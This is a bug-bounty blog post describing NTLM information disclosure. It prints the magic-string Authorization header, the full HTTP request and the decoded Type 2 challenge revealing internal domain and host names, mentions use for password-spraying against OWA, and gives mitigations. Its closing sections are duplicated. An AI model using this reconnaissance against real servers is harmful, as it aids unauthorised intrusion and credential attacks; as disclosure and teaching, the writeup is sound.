Revealing Secrets: Uncovering Vulnerabilities with NTLM Authentication

Introduction

Greetings, cybersecurity enthusiasts and fellow digital defenders! I am Raman Mohurle, known in the online world as RamanMG. As a Microsoft Most Valuable Researcher (MVR) for the year 2023 and proudly ranking #44 in the Microsoft Security Response Center (MSRC) for the third quarter of 2022, my journey into the world of ethical hacking and bug bounty hunting has been nothing short of exhilarating.

With credentials that include being a GPCSSI Intern, holding certifications such as RHCSA and N+, and a fervent commitment to the world of cybersecurity, I’m on a relentless quest to fortify our digital landscapes against potential threats.

Let’s Connect:

• Twitter: https://twitter.com/Raman_Mohurle
• LinkedIn: https://www.linkedin.com/in/raman-mohurle/
• Instagram: https://www.instagram.com/raman_mohurle/

As I continue my journey, I invite you to explore the fascinating world of cybersecurity with me. Join me in uncovering vulnerabilities, understanding the latest threat landscapes, and strengthening our digital defenses.

Bugcrowd Profile: https://bugcrowd.com/Raman_MG

Introduction to Vulnerability

In the realm of cybersecurity, a vigilant eye can uncover hidden vulnerabilities. Recently, I embarked on a journey that led me to a fascinating discovery, shedding light on the critical importance of staying ahead of potential threats. Join me as I delve into a security loophole involving NTLM authentication and explore its far-reaching implications for organizational security.

The Intricate Dance of NTLM Authentication

At the heart of our story lies the NTLM (NT LAN Manager) authentication protocol, a challenge-response system widely used in Windows environments. Unlike traditional authentication methods, NTLM never transmits the user’s actual password over the network. Instead, it relies on a unique challenge-response mechanism to verify the user’s identity.

Peeling Back the Layers: The Vulnerability Revealed

Our journey begins with the identification of a target using NTLM authentication. What follows is a remarkable chain of events. We initiate a connection and, discreetly, send either anonymous (null) credentials or a specific string known as the “magic string.” This prompts the server to respond with an NTLM Type 2 challenge response, seemingly harmless but concealing a wealth of information about the server.

Our Vulnerable Playground: A Subdomain

To illustrate the vulnerability, let’s imagine a subdomain — https://mail.example.com/ — that piqued our interest and warranted further exploration.

The Art of Exploitation

Traditionally, when we access a restricted section of a website or directory, the server triggers a login prompt. Here, we typically send blank username and password values to check for NTLM authentication, awaiting the encoded response. However, under certain circumstances, we can elicit this response without the need for a login prompt. By including the following header in our HTTP request:

Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=

HTTP Request

GET /api HTTP/1.1
Host: mail.example.com
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
Cache-Control: max-age=0
Sec-Ch-Ua: “Chromium”;v=”112", “Google Chrome”;v=”112", “Not:A-Brand”;v=”99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: “Windows”
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

…we can gain access to a treasure trove of information.

The Encoded Response

Upon receiving the server’s response, containing an NTLM challenge in the “WWW-Authenticate” header, we can decode this challenge to reveal internal information. Various tools are at our disposal for this purpose. Personally, I prefer the NTLM Challenge Decoder, although several other scripts and tools can perform the same task.

HTTP Response

HTTP/1.1 401 Unauthorized
Content-Length: 0
Date: Sat, 06 May 2023 11:32:49 GMT
Request-Id: XXXXXXX-e43f-4f5c-a487-da04de383d7d
Server: Microsoft-IIS/8.5
Www-Authenticate: NTLM TlRMTVNTUAACAAAADAAMADgAAAXXXXXXXXXXXXXXAAAAAAAAKwArABEAAAAAAACgA5OAAAAA9TAFAAQQBDAEUAWAACAAwAUwBQAEEAQwBFAFgAAQAcAEgAVAAtAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Www-Authenticate: Negotiate
X-Feserver: HX-DX-EX-DX-NX
X-Owa-Version: 15.1.2507.23
X-Powered-By: ASP.NET
X-Powered-By: ARR/3.0
Connection: close

Decoded Response

The decoded response from the server provides us with invaluable insights into the internal structure:

Identified Internal System INFO
Version: Server 2016 or 2019 / Windows 10 (build 14393)

TargetInfo:
MsvAvNbDomainName: XXXXX
MsvAvNbComputerName: HX-DX-EX-DX-NX
MsvAvDnsDomainName: XXXXX.XXXX
MsvAvDnsComputerName: ht-dc-ex-d1-n2.XXXXX.XXXX
MsvAvDnsTreeName: XXXXX.XXXX
MsvAvTimestamp: May 06, 2023 11:24:31.617108

The Ominous Impact

The implications of this vulnerability are profound. During a penetration test, an attacker can unravel an organization’s internal naming conventions, identify obsolete operating systems, and unveil hidden internal DNS names. For instance, data like the domain suffix, found within the decoded response, can aid in password-spraying attacks against an organization’s Outlook Web Application (OWA). Such attacks are frequently used by hackers to unearth valid domain credentials, potentially paving the way for more severe exploits.

Guarding Against NTLM Vulnerabilities

As security custodians, it’s our responsibility to stay ahead of emerging threats and safeguard our organization’s assets. To mitigate NTLM vulnerabilities, consider adopting these proactive measures:

1. Surveillance of NTLM Usage: Regularly scrutinize NTLM authentication logs, pinpointing irregularities or anomalies.
2. Embrace Robust Authentication Methods: Transition towards more secure authentication practices, such as multi-factor authentication (MFA).
3. Update and Fortify: Ensure all systems and software remain up-to-date with the latest security patches, thereby mitigating known vulnerabilities.

Conclusion

Discovering vulnerabilities, like the one entangled with NTLM authentication, underscores the pivotal role ethical hackers play in fortifying cybersecurity. By responsibly disclosing these vulnerabilities to organizations, we contribute to a safer digital world. Remember, the journey towards security is unceasing, and united, we can construct impervious defenses against ever-evolving threats.

Guarding Against NTLM Vulnerabilities

As security custodians, it’s our responsibility to stay ahead of emerging threats and safeguard our organization’s assets. To mitigate NTLM vulnerabilities, consider adopting these proactive measures:

1. Surveillance of NTLM Usage: Regularly scrutinize NTLM authentication logs, pinpointing irregularities or anomalies.
2. Embrace Robust Authentication Methods: Transition towards more secure authentication practices, such as multi-factor authentication (MFA).
3. Update and Fortify: Ensure all systems and software remain up-to-date with the latest security patches, thereby mitigating known vulnerabilities.

Conclusion

Discovering vulnerabilities, like the one entangled with NTLM authentication, underscores the pivotal role ethical hackers play in fortifying cybersecurity. By responsibly disclosing these vulnerabilities to organizations, we contribute to a safer digital world. Remember, the journey towards security is unceasing, and united, we can construct impervious defenses against ever-evolving threats.

NTLM Findings